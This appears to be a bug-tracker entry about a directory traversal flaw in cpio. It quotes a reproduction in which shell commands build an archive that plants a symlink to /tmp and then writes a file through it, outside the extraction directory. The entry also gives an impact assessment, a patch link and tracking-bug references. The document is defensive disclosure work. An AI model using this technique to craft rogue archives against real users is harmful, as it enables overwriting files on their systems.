It was reported [1] that cpio is susceptible to a directory traversal vulnerability. Original report follows: ... While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory. Example: 1) create a sample archive: ln -s /tmp dir echo dir | cpio -oF test.cpio rm dir mkdir dir echo hello > dir/file echo dir/file | cpio -oAF test.cpio rm -r dir 2) test it: cpio --no-absolute-filenames -ivF test.cpio This will create a symlink "dir" in the current directory and a file "/tmp/file". ... No patches are available at this time. [1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774669
Analysis ======== This attack requires to social engineer the user to open the cpio archive, impact of this is low.
Suse created a patch for this, attached at: https://bugzilla.suse.com/show_bug.cgi?id=658010
Created cpio tracking bugs for this issue: Affects: fedora-all [bug 1188590]
*** Bug 1539685 has been marked as a duplicate of this bug. ***